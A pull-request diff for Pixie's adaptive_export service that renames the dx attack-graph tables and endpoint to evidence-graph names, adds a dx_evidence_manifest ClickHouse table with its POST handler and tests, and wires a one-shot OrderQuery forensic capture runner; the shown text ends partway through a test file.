### PR TITLE
adaptive_export: /query runner + dx_evidence_graph rename + evidence_manifest (combines #73/#77/#78)

### DIFF
--- a/src/vizier/services/adaptive_export/cmd/main.go
+++ b/src/vizier/services/adaptive_export/cmd/main.go
@@ -576,9 +576,9 @@ func main() {
 		// Wire the controller as the /query runner: dx OrderQuery → one-shot pixie
 		// capture written to forensic_db (write⊇read; entlein/dx#93). When the
 		// operator-side querier is disabled (no PushPixieTables), OrderQuery returns
-		// an error and /query 502s — start/stop + dx_attack_graph still work.
+		// an error and /query 502s — start/stop + dx_evidence_graph still work.
 		ctrlSrv := control.New(activeSet, ctl)
-		ctrlSrv.SetGraphWriter(applier) // dx_attack_graph ingest → ClickHouse
+		ctrlSrv.SetGraphWriter(applier) // dx_evidence_graph ingest → ClickHouse
 		// Bearer-JWT auth on the control surface (CodeRabbit: protect control
 		// endpoints). Same shared lib + signing key the broker/PEM use — dx
 		// attaches the service JWT it already mints. Default-OFF so this can

--- a/src/vizier/services/adaptive_export/cmd/main.go
+++ b/src/vizier/services/adaptive_export/cmd/main.go
@@ -578,7 +578,8 @@ func main() {
 		// operator-side querier is disabled (no PushPixieTables), OrderQuery returns
 		// an error and /query 502s — start/stop + dx_evidence_graph still work.
 		ctrlSrv := control.New(activeSet, ctl)
-		ctrlSrv.SetGraphWriter(applier) // dx_evidence_graph ingest → ClickHouse
+		ctrlSrv.SetGraphWriter(applier)    // dx_evidence_graph ingest → ClickHouse
+		ctrlSrv.SetManifestWriter(applier) // dx_evidence_manifest ingest → ClickHouse
 		// Bearer-JWT auth on the control surface (CodeRabbit: protect control
 		// endpoints). Same shared lib + signing key the broker/PEM use — dx
 		// attaches the service JWT it already mints. Default-OFF so this can

--- a/src/vizier/services/adaptive_export/cmd/main.go
+++ b/src/vizier/services/adaptive_export/cmd/main.go
@@ -573,8 +573,12 @@ func main() {
 	// steers this AE's activeSet (Upsert/Remove) over HTTP. Off by default so
 	// the existing trigger→controller→activeSet flow is unchanged.
 	if addr := os.Getenv("CONTROL_ADDR"); addr != "" {
-		ctrlSrv := control.New(activeSet, nil) // OrderQuery runner wired later
-		ctrlSrv.SetGraphWriter(applier)        // dx_attack_graph ingest → ClickHouse
+		// Wire the controller as the /query runner: dx OrderQuery → one-shot pixie
+		// capture written to forensic_db (write⊇read; entlein/dx#93). When the
+		// operator-side querier is disabled (no PushPixieTables), OrderQuery returns
+		// an error and /query 502s — start/stop + dx_attack_graph still work.
+		ctrlSrv := control.New(activeSet, ctl)
+		ctrlSrv.SetGraphWriter(applier) // dx_attack_graph ingest → ClickHouse
 		// Bearer-JWT auth on the control surface (CodeRabbit: protect control
 		// endpoints). Same shared lib + signing key the broker/PEM use — dx
 		// attaches the service JWT it already mints. Default-OFF so this can

--- a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
@@ -70,6 +70,10 @@ var OperatorOwnedTables = []string{
 	"dx_evidence_graph",
 	// rule-ins-only VIEW over dx_evidence_graph; created AFTER it (depends on it).
 	"dx_evidence_graph_malignant",
+	// dx §9 completeness manifest — one row per verdict naming the evidence rows
+	// dx consulted. Created on boot so POST /dx/evidence_manifest has a target.
+	// Independent of dx_evidence_graph. Not a pixie table → not in PixieTables().
+	"dx_evidence_manifest",
 }
 
 // Applier applies operator-owned DDL to a ClickHouse cluster over the
@@ -117,6 +121,20 @@ func (a *Applier) WriteEvidenceGraph(ctx context.Context, jsonEachRow []byte) er
 		return nil
 	}
 	_, err := a.c.Insert(ctx, "INSERT INTO forensic_db.dx_evidence_graph FORMAT JSONEachRow",
+		jsonEachRow, chhttp.InsertOptions{})
+	return err
+}
+
+// WriteEvidenceManifest inserts one dx §9 completeness manifest (per verdict)
+// into forensic_db.dx_evidence_manifest. jsonEachRow is a single JSONEachRow
+// object whose keys are the column names; the control handler pre-renders the
+// nested collections (case_window/findings/orders/seeds/chain) as JSON text so
+// the insert is ClickHouse-version independent. No-op on empty input.
+func (a *Applier) WriteEvidenceManifest(ctx context.Context, jsonEachRow []byte) error {
+	if len(jsonEachRow) == 0 {
+		return nil
+	}
+	_, err := a.c.Insert(ctx, "INSERT INTO forensic_db.dx_evidence_manifest FORMAT JSONEachRow",
 		jsonEachRow, chhttp.InsertOptions{})
 	return err
 }

--- a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
@@ -67,9 +67,9 @@ var OperatorOwnedTables = []string{
 	// dx_evidence_graph UI (px.DataFrame clickhouse_dsn) has a real,
 	// globally-registered table to read. dx emits edges, AE persists.
 	// Not a pixie socket_tracer table → not in PixieTables().
-	"dx_attack_graph",
-	// rule-ins-only VIEW over dx_attack_graph; created AFTER it (depends on it).
-	"dx_attack_graph_malicious",
+	"dx_evidence_graph",
+	// rule-ins-only VIEW over dx_evidence_graph; created AFTER it (depends on it).
+	"dx_evidence_graph_malignant",
 }
 
 // Applier applies operator-owned DDL to a ClickHouse cluster over the
@@ -108,15 +108,15 @@ func (a *Applier) Apply(ctx context.Context) error {
 	return nil
 }
 
-// WriteAttackGraph inserts dx evidence-graph edges into
-// forensic_db.dx_attack_graph. jsonEachRow is newline-delimited JSON objects
+// WriteEvidenceGraph inserts dx evidence-graph edges into
+// forensic_db.dx_evidence_graph. jsonEachRow is newline-delimited JSON objects
 // whose keys are the column names (JSONEachRow; unknown keys are skipped,
 // missing columns default). No-op on empty input.
-func (a *Applier) WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error {
+func (a *Applier) WriteEvidenceGraph(ctx context.Context, jsonEachRow []byte) error {
 	if len(jsonEachRow) == 0 {
 		return nil
 	}
-	_, err := a.c.Insert(ctx, "INSERT INTO forensic_db.dx_attack_graph FORMAT JSONEachRow",
+	_, err := a.c.Insert(ctx, "INSERT INTO forensic_db.dx_evidence_graph FORMAT JSONEachRow",
 		jsonEachRow, chhttp.InsertOptions{})
 	return err
 }

--- a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
@@ -59,7 +59,7 @@ func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) {
 	}
 	// Spot-check that the SECOND call is for the first OperatorOwnedTables entry,
 	// and that the LAST call is for the last OperatorOwnedTables entry (robust to
-	// new operator-owned tables being appended, e.g. dx_attack_graph).
+	// new operator-owned tables being appended, e.g. dx_evidence_graph).
 	if !strings.Contains(bodies[1], "forensic_db."+OperatorOwnedTables[0]) {
 		t.Fatalf("second DDL not for %s; got: %s", OperatorOwnedTables[0], bodies[1])
 	}
@@ -228,7 +228,7 @@ func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) {
 // plugin can auto-DDL them with the wrong schema), then the operator's
 // own write targets in declared order.
 func TestOperatorOwnedTables_TrailingOperatorTables(t *testing.T) {
-	want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_attack_graph", "dx_attack_graph_malicious"}
+	want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_evidence_graph", "dx_evidence_graph_malignant"}
 	got := OperatorOwnedTables[len(OperatorOwnedTables)-len(want):]
 	for i, w := range want {
 		if got[i] != w {

--- a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
@@ -228,7 +228,7 @@ func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) {
 // plugin can auto-DDL them with the wrong schema), then the operator's
 // own write targets in declared order.
 func TestOperatorOwnedTables_TrailingOperatorTables(t *testing.T) {
-	want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_evidence_graph", "dx_evidence_graph_malignant"}
+	want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_evidence_graph", "dx_evidence_graph_malignant", "dx_evidence_manifest"}
 	got := OperatorOwnedTables[len(OperatorOwnedTables)-len(want):]
 	for i, w := range want {
 		if got[i] != w {

--- a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
@@ -71,6 +71,10 @@ var KnownTables = []string{
 	// dx_evidence_graph UI reads this by default so benign rows are filtered
 	// in ClickHouse, not pulled. Must follow dx_evidence_graph (depends on it).
 	"dx_evidence_graph_malignant",
+	// operator-owned dx §9 completeness manifest — one row per verdict naming
+	// the evidence rows dx consulted (POST /dx/evidence_manifest). NOT a pixie
+	// table. Independent of dx_evidence_graph.
+	"dx_evidence_manifest",
 }
 
 // ErrUnknownTable is returned by DDL / Columns when asked for a table

--- a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
@@ -66,11 +66,11 @@ var KnownTables = []string{
 	"ae_reconcile",
 	// operator-owned dx evidence-graph edge list (read by the Pixie
 	// dx_evidence_graph UI via clickhouse_dsn). NOT a pixie table.
-	"dx_attack_graph",
-	// rule-ins-only VIEW over dx_attack_graph (condition != ''); the
+	"dx_evidence_graph",
+	// rule-ins-only VIEW over dx_evidence_graph (condition != ''); the
 	// dx_evidence_graph UI reads this by default so benign rows are filtered
-	// in ClickHouse, not pulled. Must follow dx_attack_graph (depends on it).
-	"dx_attack_graph_malicious",
+	// in ClickHouse, not pulled. Must follow dx_evidence_graph (depends on it).
+	"dx_evidence_graph_malignant",
 }
 
 // ErrUnknownTable is returned by DDL / Columns when asked for a table

--- a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
@@ -535,3 +535,34 @@ CREATE TABLE IF NOT EXISTS forensic_db.dx_evidence_graph (
 -- dx_evidence_graph UI reads by default so benign rows stay in ClickHouse.
 CREATE VIEW IF NOT EXISTS forensic_db.dx_evidence_graph_malignant AS
   SELECT * FROM forensic_db.dx_evidence_graph WHERE `condition` != '';
+
+-- dx_evidence_manifest — the §9 completeness contract: one row per verdict
+-- (ruled_in | metastasis), naming the evidence rows dx consulted so the
+-- validator can join them against what AE persisted (write⊇read, checkable).
+-- Operator-owned (dx emits the manifest via POST /dx/evidence_manifest, AE
+-- persists it); NOT a pixie table. Column names are the manifest.Manifest
+-- JSON tags (dx internal/manifest). Same event_time (unix NANOSECONDS) +
+-- hostname read-path convention as dx_evidence_graph so it is px-readable.
+-- The nested collections (case_window/findings/orders/seeds/chain) are stored
+-- as JSON text in String columns; the control handler pre-renders them so the
+-- JSONEachRow insert is ClickHouse-version independent.
+CREATE TABLE IF NOT EXISTS forensic_db.dx_evidence_manifest (
+    investigation_id  String,
+    event_time        UInt64,
+    hostname          String,
+    `condition`       String,
+    verdict           String,
+    confidence        Float64,
+    posterior         Float64,
+    catalog_version   String,
+    case_window       String,
+    findings          String,
+    orders            String,
+    seeds             String,
+    chain             String,
+    evidence_hash     String
+) ENGINE = MergeTree()
+  ORDER BY (event_time, hostname)
+  PARTITION BY toYYYYMM(fromUnixTimestamp64Nano(event_time))
+  TTL toDateTime(fromUnixTimestamp64Nano(event_time)) + INTERVAL 30 DAY DELETE
+  SETTINGS index_granularity = 8192;

--- a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
@@ -492,7 +492,7 @@ CREATE TABLE IF NOT EXISTS forensic_db.ae_reconcile (
   -- unbounded storage (CodeRabbit). 30d matches the pixie observation tables.
   TTL toDateTime(ts) + INTERVAL 30 DAY DELETE;
 
--- dx_attack_graph — dx evidence-graph edge list: one row per directed hop of an
+-- dx_evidence_graph — dx evidence-graph edge list: one row per directed hop of an
 -- investigation (delivery/egress/execution/exfil/pivot), read by the Pixie
 -- dx_evidence_graph UI via px.DataFrame(clickhouse_dsn=...). Operator-owned
 -- (dx emits the edges, AE persists them); NOT a pixie socket_tracer table.
@@ -503,7 +503,7 @@ CREATE TABLE IF NOT EXISTS forensic_db.ae_reconcile (
 -- event_time". Same convention as kubescape_logs. event_time is nanos, so the
 -- partition/TTL use fromUnixTimestamp64Nano (toDateTime would read ns as seconds
 -- → year ~58e9 → broken partitions; see the soc#225 fix).
-CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph (
+CREATE TABLE IF NOT EXISTS forensic_db.dx_evidence_graph (
     investigation_id  String,
     event_time        UInt64,
     hostname          String,
@@ -531,7 +531,7 @@ CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph (
   TTL toDateTime(fromUnixTimestamp64Nano(event_time)) + INTERVAL 30 DAY DELETE
   SETTINGS index_granularity = 8192;
 
--- dx_attack_graph_malicious — rule-ins-only view (condition != '') the
+-- dx_evidence_graph_malignant — rule-ins-only view (condition != '') the
 -- dx_evidence_graph UI reads by default so benign rows stay in ClickHouse.
-CREATE VIEW IF NOT EXISTS forensic_db.dx_attack_graph_malicious AS
-  SELECT * FROM forensic_db.dx_attack_graph WHERE `condition` != '';
+CREATE VIEW IF NOT EXISTS forensic_db.dx_evidence_graph_malignant AS
+  SELECT * FROM forensic_db.dx_evidence_graph WHERE `condition` != '';

--- a/src/vizier/services/adaptive_export/internal/control/server.go
+++ b/src/vizier/services/adaptive_export/internal/control/server.go
@@ -54,16 +54,16 @@ type queryRunner interface {
 }
 
 // graphWriter persists dx evidence-graph edges (newline-delimited JSON,
-// JSONEachRow) to forensic_db.dx_attack_graph. nil → /dx/attack_graph 501s.
+// JSONEachRow) to forensic_db.dx_evidence_graph. nil → /dx/evidence_graph 501s.
 type graphWriter interface {
-	WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error
+	WriteEvidenceGraph(ctx context.Context, jsonEachRow []byte) error
 }
 
 // Server is the control HTTP surface.
 type Server struct {
 	set    exporter
 	runner queryRunner // may be nil; /query then returns 501
-	graph  graphWriter // may be nil; /dx/attack_graph then returns 501
+	graph  graphWriter // may be nil; /dx/evidence_graph then returns 501
 	mux    *http.ServeMux
 	verify func(bearer string) error // nil → auth disabled; set via SetAuth
 }
@@ -76,11 +76,11 @@ func New(set exporter, runner queryRunner) *Server {
 	s.mux.HandleFunc("/export/start", s.handleStart)
 	s.mux.HandleFunc("/export/stop", s.handleStop)
 	s.mux.HandleFunc("/query", s.handleQuery)
-	s.mux.HandleFunc("/dx/attack_graph", s.handleDXAttackGraph)
+	s.mux.HandleFunc("/dx/evidence_graph", s.handleDXEvidenceGraph)
 	return s
 }
 
-// SetGraphWriter wires the dx_attack_graph sink.
+// SetGraphWriter wires the dx_evidence_graph sink.
 func (s *Server) SetGraphWriter(g graphWriter) { s.graph = g }
 
 // SetAuth turns on bearer-JWT auth for the control surface, verified with the
@@ -115,9 +115,9 @@ func (s *Server) Handler() http.Handler {
 	})
 }
 
-// handleDXAttackGraph ingests a JSON array of dx evidence-graph edges and writes
-// them to forensic_db.dx_attack_graph (as JSONEachRow).
-func (s *Server) handleDXAttackGraph(w http.ResponseWriter, r *http.Request) {
+// handleDXEvidenceGraph ingests a JSON array of dx evidence-graph edges and writes
+// them to forensic_db.dx_evidence_graph (as JSONEachRow).
+func (s *Server) handleDXEvidenceGraph(w http.ResponseWriter, r *http.Request) {
 	if r.Method != http.MethodPost {
 		w.WriteHeader(http.StatusMethodNotAllowed)
 		return
@@ -140,7 +140,7 @@ func (s *Server) handleDXAttackGraph(w http.ResponseWriter, r *http.Request) {
 		buf.Write(e)
 		buf.WriteByte('\n')
 	}
-	if err := s.graph.WriteAttackGraph(r.Context(), buf.Bytes()); err != nil {
+	if err := s.graph.WriteEvidenceGraph(r.Context(), buf.Bytes()); err != nil {
 		w.WriteHeader(http.StatusBadGateway)
 		return
 	}
@@ -175,7 +175,7 @@ func (t targetReq) target() anomaly.Target {
 }
 
 // maxControlBodyBytes caps a single control-surface request body. The
-// largest legitimate payload we accept is /dx/attack_graph which is a
+// largest legitimate payload we accept is /dx/evidence_graph which is a
 // JSON array of pre-marshalled JSONEachRow lines — measured live the
 // hottest dx rule-in pass fits in ~256 KiB. 4 MiB is well above that
 // and below the per-pod memory headroom an oversized POST could

--- a/src/vizier/services/adaptive_export/internal/control/server.go
+++ b/src/vizier/services/adaptive_export/internal/control/server.go
@@ -59,13 +59,20 @@ type graphWriter interface {
 	WriteEvidenceGraph(ctx context.Context, jsonEachRow []byte) error
 }
 
+// manifestWriter persists one dx §9 completeness manifest per verdict
+// (JSONEachRow) to forensic_db.dx_evidence_manifest. nil → /dx/evidence_manifest 501s.
+type manifestWriter interface {
+	WriteEvidenceManifest(ctx context.Context, jsonEachRow []byte) error
+}
+
 // Server is the control HTTP surface.
 type Server struct {
-	set    exporter
-	runner queryRunner // may be nil; /query then returns 501
-	graph  graphWriter // may be nil; /dx/evidence_graph then returns 501
-	mux    *http.ServeMux
-	verify func(bearer string) error // nil → auth disabled; set via SetAuth
+	set      exporter
+	runner   queryRunner    // may be nil; /query then returns 501
+	graph    graphWriter    // may be nil; /dx/evidence_graph then returns 501
+	manifest manifestWriter // may be nil; /dx/evidence_manifest then returns 501
+	mux      *http.ServeMux
+	verify   func(bearer string) error // nil → auth disabled; set via SetAuth
 }
 
 // New builds the control server. runner may be nil for deployments that
@@ -77,11 +84,15 @@ func New(set exporter, runner queryRunner) *Server {
 	s.mux.HandleFunc("/export/stop", s.handleStop)
 	s.mux.HandleFunc("/query", s.handleQuery)
 	s.mux.HandleFunc("/dx/evidence_graph", s.handleDXEvidenceGraph)
+	s.mux.HandleFunc("/dx/evidence_manifest", s.handleDXEvidenceManifest)
 	return s
 }
 
 // SetGraphWriter wires the dx_evidence_graph sink.
 func (s *Server) SetGraphWriter(g graphWriter) { s.graph = g }
+
+// SetManifestWriter wires the dx_evidence_manifest sink.
+func (s *Server) SetManifestWriter(m manifestWriter) { s.manifest = m }
 
 // SetAuth turns on bearer-JWT auth for the control surface, verified with the
 // SAME shared lib + signing key the vizier broker/PEM use (px.dev/pixie/src/
@@ -145,6 +156,81 @@ func (s *Server) handleDXEvidenceGraph(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 	w.WriteHeader(http.StatusAccepted)
+}
+
+// dxManifest mirrors the wire shape of dx's manifest.Manifest (internal/manifest).
+// Scalars map to typed forensic_db.dx_evidence_manifest columns; the nested
+// collections are held as raw JSON and persisted as JSON text in String columns
+// so the JSONEachRow insert is ClickHouse-version independent.
+type dxManifest struct {
+	InvestigationID string          `json:"investigation_id"`
+	EventTime       int64           `json:"event_time"`
+	Hostname        string          `json:"hostname"`
+	Condition       string          `json:"condition"`
+	Verdict         string          `json:"verdict"`
+	Confidence      float64         `json:"confidence"`
+	Posterior       float64         `json:"posterior"`
+	CatalogVersion  string          `json:"catalog_version"`
+	CaseWindow      json.RawMessage `json:"case_window"`
+	Findings        json.RawMessage `json:"findings"`
+	Orders          json.RawMessage `json:"orders"`
+	Seeds           json.RawMessage `json:"seeds"`
+	Chain           json.RawMessage `json:"chain"`
+	EvidenceHash    string          `json:"evidence_hash"`
+}
+
+// handleDXEvidenceManifest ingests ONE dx completeness manifest (per verdict)
+// and writes it to forensic_db.dx_evidence_manifest as a single JSONEachRow
+// row, with the nested collections rendered as JSON text.
+func (s *Server) handleDXEvidenceManifest(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodPost {
+		w.WriteHeader(http.StatusMethodNotAllowed)
+		return
+	}
+	if s.manifest == nil {
+		w.WriteHeader(http.StatusNotImplemented)
+		return
+	}
+	var m dxManifest
+	if !decode(w, r, &m) {
+		w.WriteHeader(http.StatusBadRequest)
+		return
+	}
+	row := map[string]any{
+		"investigation_id": m.InvestigationID,
+		"event_time":       m.EventTime,
+		"hostname":         m.Hostname,
+		"condition":        m.Condition,
+		"verdict":          m.Verdict,
+		"confidence":       m.Confidence,
+		"posterior":        m.Posterior,
+		"catalog_version":  m.CatalogVersion,
+		"case_window":      jsonText(m.CaseWindow),
+		"findings":         jsonText(m.Findings),
+		"orders":           jsonText(m.Orders),
+		"seeds":            jsonText(m.Seeds),
+		"chain":            jsonText(m.Chain),
+		"evidence_hash":    m.EvidenceHash,
+	}
+	line, err := json.Marshal(row)
+	if err != nil {
+		w.WriteHeader(http.StatusBadRequest)
+		return
+	}
+	if err := s.manifest.WriteEvidenceManifest(r.Context(), append(line, '\n')); err != nil {
+		w.WriteHeader(http.StatusBadGateway)
+		return
+	}
+	w.WriteHeader(http.StatusAccepted)
+}
+
+// jsonText renders a nested JSON value as compact text for a String column;
+// nil/absent/null → "" so the column holds an empty string rather than "null".
+func jsonText(raw json.RawMessage) string {
+	if len(raw) == 0 || string(raw) == "null" {
+		return ""
+	}
+	return string(raw)
 }
 
 // ── wire types ────────────────────────────────────────────────────────

--- a/src/vizier/services/adaptive_export/internal/control/server_test.go
+++ b/src/vizier/services/adaptive_export/internal/control/server_test.go
@@ -17,6 +17,8 @@
 package control
 
 import (
+	"context"
+	"encoding/json"
 	"net/http"
 	"net/http/httptest"
 	"strings"
@@ -218,3 +220,60 @@ type fakeErr struct{}
 func (fakeErr) Error() string { return "boom" }
 
 var errFake = fakeErr{}
+
+type fakeManifest struct {
+	got string
+	err error
+}
+
+func (f *fakeManifest) WriteEvidenceManifest(_ context.Context, jsonEachRow []byte) error {
+	f.got = string(jsonEachRow)
+	return f.err
+}
+
+// TestEvidenceManifest: /dx/evidence_manifest is 501 without a writer; with one it
+// persists ONE JSONEachRow row per verdict, scalars as typed columns and the nested
+// collections (findings/case_window/...) rendered as JSON *text* so the insert is
+// ClickHouse-version independent.
+func TestEvidenceManifest(t *testing.T) {
+	srv := New(&fakeExporter{}, nil)
+	if r := do(t, srv, http.MethodPost, "/dx/evidence_manifest", `{"investigation_id":"i1"}`); r.StatusCode != http.StatusNotImplemented {
+		t.Fatalf("no writer: got %d, want 501", r.StatusCode)
+	}
+
+	fm := &fakeManifest{}
+	srv.SetManifestWriter(fm)
+	body := `{"investigation_id":"i1","event_time":1730000000000000000,"hostname":"n1",` +
+		`"verdict":"ruled_in","confidence":0.9,"case_window":[1.0,2.0],` +
+		`"findings":[{"vector":"process"}],"evidence_hash":"h"}`
+	if r := do(t, srv, http.MethodPost, "/dx/evidence_manifest", body); r.StatusCode != http.StatusAccepted {
+		t.Fatalf("got %d, want 202", r.StatusCode)
+	}
+	if !strings.HasSuffix(fm.got, "\n") {
+		t.Fatalf("missing JSONEachRow newline terminator: %q", fm.got)
+	}
+	var row map[string]any
+	if err := json.Unmarshal([]byte(strings.TrimSpace(fm.got)), &row); err != nil {
+		t.Fatalf("row not valid JSON: %v (%s)", err, fm.got)
+	}
+	if row["investigation_id"] != "i1" || row["hostname"] != "n1" || row["verdict"] != "ruled_in" {
+		t.Fatalf("scalar columns wrong: %#v", row)
+	}
+	// event_time is a large nanos int; it must round-trip as an integer, not a float in sci notation.
+	if !strings.Contains(fm.got, `"event_time":1730000000000000000`) {
+		t.Fatalf("event_time not an integer literal: %s", fm.got)
+	}
+	// nested collections persisted as JSON text strings, not raw arrays.
+	if row["findings"] != `[{"vector":"process"}]` {
+		t.Fatalf("findings should be JSON text, got %#v", row["findings"])
+	}
+	if row["case_window"] != `[1.0,2.0]` {
+		t.Fatalf("case_window should be JSON text, got %#v", row["case_window"])
+	}
+
+	// writer failure surfaces as 502.
+	fm.err = errFake
+	if r := do(t, srv, http.MethodPost, "/dx/evidence_manifest", body); r.StatusCode != http.StatusBadGateway {
+		t.Fatalf("writer error: got %d, want 502", r.StatusCode)
+	}
+}

--- a/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel
@@ -34,7 +34,10 @@ go_library(
 
 pl_go_test(
     name = "controller_test",
-    srcs = ["controller_test.go"],
+    srcs = [
+        "controller_test.go",
+        "order_query_test.go",
+    ],
     embed = [":controller"],
     deps = [
         "//src/vizier/services/adaptive_export/internal/anomaly",

--- a/src/vizier/services/adaptive_export/internal/controller/controller.go
+++ b/src/vizier/services/adaptive_export/internal/controller/controller.go
@@ -31,6 +31,7 @@ package controller
 
 import (
 	"context"
+	"errors"
 	"sync"
 	"time"
 
@@ -243,6 +244,66 @@ func New(trig Trigger, snk Sink, cfg Config, clk Clock) *Controller {
 func (c *Controller) WithPixieQuerier(q PixieQuerier) *Controller {
 	c.querier = q
 	return c
+}
+
+// OrderQuery runs ONE control-ordered (target, table, window) query and writes the
+// result through AE's normal sink — the dx→AE write⊇read path behind the control
+// surface's POST /query. Unlike pushPixieRows (one goroutine per kubescape-anomaly
+// window, driven by the Trigger), this is a single-shot forensic capture for a
+// table dx EXPLICITLY consulted to reach a verdict. It is how the evidence dx read
+// — e.g. the jndi-in-http the PEM bench found at triage — lands in forensic_db even
+// when no kubescape anomaly opened a window for that pod (entlein/dx#93). Reuses the
+// same QueryFor → querier.Query → sink.WritePixieRows path + globalSem + reconcile
+// accounting as the anomaly-driven push. Satisfies control.queryRunner.
+func (c *Controller) OrderQuery(target anomaly.Target, table string, start, end time.Time, queryID string) error {
+	if c.querier == nil {
+		return errors.New("controller: no pixie querier (operator-side push disabled)")
+	}
+	now := c.clock.Now()
+	q, err := pxl.QueryFor(table, target, start, end, now)
+	if err != nil {
+		return err
+	}
+	// Background ctx with per-op timeouts mirroring pushPixieRows: a control-ordered
+	// capture must complete independently of any anomaly window's lifecycle.
+	var readCount, wroteCount int
+	var recErr string
+	defer func() {
+		c.cfg.Rec.Record(context.Background(), reconcile.Row{
+			TS: now, Mode: "ordered", Table: table,
+			Namespace: target.Namespace, Pod: target.Pod,
+			WinStart: start, WinEnd: end,
+			ReadCount: int64(readCount), WroteCount: int64(wroteCount),
+			WriteErr: recErr, Hostname: c.cfg.Hostname,
+		})
+	}()
+	if c.globalSem != nil {
+		c.globalSem <- struct{}{}
+		defer func() { <-c.globalSem }()
+	}
+	qctx, cancel := context.WithTimeout(context.Background(), 180*time.Second)
+	rows, qerr := c.querier.Query(qctx, q)
+	cancel()
+	if qerr != nil {
+		recErr = qerr.Error()
+		return qerr
+	}
+	readCount = len(rows)
+	if len(rows) == 0 {
+		return nil // nothing to persist; the read/0-wrote reconcile row still records it
+	}
+	wctx, wcancel := context.WithTimeout(context.Background(), 60*time.Second)
+	werr := c.sink.WritePixieRows(wctx, table, rows)
+	wcancel()
+	if werr != nil {
+		recErr = werr.Error()
+		return werr
+	}
+	wroteCount = len(rows)
+	log.WithFields(log.Fields{
+		"table": table, "rows": len(rows), "pod": target.Pod, "query_id": queryID,
+	}).Info("ordered pixie rows written to forensic_db (dx→AE /query)")
+	return nil
 }
 
 // Rehydrate populates the in-memory active set from ClickHouse so a

--- a/src/vizier/services/adaptive_export/internal/controller/order_query_test.go
+++ b/src/vizier/services/adaptive_export/internal/controller/order_query_test.go
@@ -46,6 +46,7 @@ func (s *recordingSink) Write(context.Context, []sink.AttributionRow) error { re
 func (s *recordingSink) QueryActive(context.Context, string) ([]sink.AttributionRow, error) {
 	return nil, nil
 }
+
 func (s *recordingSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
 	if s.werr != nil {
 		return s.werr
@@ -55,6 +56,7 @@ func (s *recordingSink) WritePixieRows(_ context.Context, table string, rows []m
 	s.written[table] += len(rows)
 	return nil
 }
+
 func (s *recordingSink) count(table string) int {
 	s.mu.Lock()
 	defer s.mu.Unlock()
@@ -104,7 +106,7 @@ func TestOrderQueryWritesRows(t *testing.T) {
 }
 
 // With the operator-side querier disabled, OrderQuery errors (so /query 502s) —
-// start/stop + dx_attack_graph remain usable.
+// start/stop + dx_evidence_graph remain usable.
 func TestOrderQueryNoQuerierErrors(t *testing.T) {
 	snk := newRecordingSink()
 	lo, hi := oqWindow()

--- a/src/vizier/services/adaptive_export/internal/controller/order_query_test.go
+++ b/src/vizier/services/adaptive_export/internal/controller/order_query_test.go
@@ -1,0 +1,138 @@
+/*
+ * Copyright 2018- The Pixie Authors.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+package controller
+
+// Tests for Controller.OrderQuery — the dx→AE /query runner (write⊇read, dx#93):
+// a one-shot (target, table, window) capture that queries pixie and writes the
+// result through the normal sink, independent of any kubescape-anomaly window.
+
+import (
+	"context"
+	"errors"
+	"sync"
+	"testing"
+	"time"
+
+	"px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+	"px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// recordingSink satisfies controller.Sink and records WritePixieRows calls.
+type recordingSink struct {
+	mu      sync.Mutex
+	written map[string]int // table → row count written
+	werr    error
+}
+
+func newRecordingSink() *recordingSink { return &recordingSink{written: map[string]int{}} }
+
+func (s *recordingSink) Write(context.Context, []sink.AttributionRow) error { return nil }
+func (s *recordingSink) QueryActive(context.Context, string) ([]sink.AttributionRow, error) {
+	return nil, nil
+}
+func (s *recordingSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
+	if s.werr != nil {
+		return s.werr
+	}
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	s.written[table] += len(rows)
+	return nil
+}
+func (s *recordingSink) count(table string) int {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return s.written[table]
+}
+
+// stubQuerier returns canned rows (or an error) for any PxL.
+type stubQuerier struct {
+	rows []map[string]any
+	err  error
+}
+
+func (q *stubQuerier) Query(context.Context, string) ([]map[string]any, error) {
